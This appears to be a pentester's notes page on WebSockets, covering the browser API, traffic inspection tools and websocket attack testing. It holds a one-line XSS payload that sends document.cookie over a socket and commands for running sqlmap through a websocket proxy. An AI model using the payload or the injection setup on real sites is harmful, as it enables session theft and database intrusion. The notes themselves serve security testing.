WebSockets
WebSockets are natively integrated within most web browsers. They allow real-time communication between a server and a client.
The socket.io library is a well-known library built on web sockets, while adding a lot of convenient features for real world apps.
For simple applications, we can directly use the WebSocket API:
const socket = new WebSocket('ws://IP:port/test'); // or "wss://" for secure communication
socket.onmessage = message => console.log("Received: " + message.data);
socket.send('test');
You can explore the websocket traffic from the network tab/Burp. See also tools such as wscat (2.1k β) and websocat (6.6k β).
WebSocket Pentester Notes β οΈ
Depending on how services are integrated with websockets, XSS/CSRF and SQLi attacks might be possible.
<img src="" onerror="socket.send(document.cookie)">
Using SQLMap with websockets may not work. We can try sqlmap-websocket-proxy (0.1k β), but it's more efficient to write your own (reuse socket, unify results for SQLMap, handle special attacks, etc.).
$ pipx install git+https://github.com/BKreisel/sqlmap-websocket-proxy
$ DEST="$HOME/tools/sqlmap-websocket-proxy"
$ git clone -b "main" https://github.com/BKreisel/sqlmap-websocket-proxy.git $DEST
$ # do any changes to the code
$ pipx install $DEST # or reinstall if already installed
$ sqlmap-websocket-proxy -u 'ws://IP:port/testdb' -d '{"parameter":"%param%"}' -p 1337
$ sqlmap -u 'http://localhost:1337/?param1=1*' [...]
π» To-do π»
Stuff that I found, but never read/used yet.
- The WebSocket Handbook
-
Sec-WebSocket-Version -
Sec-WebSocket-Key: base64encodedkey - STEWS (enumeration tool)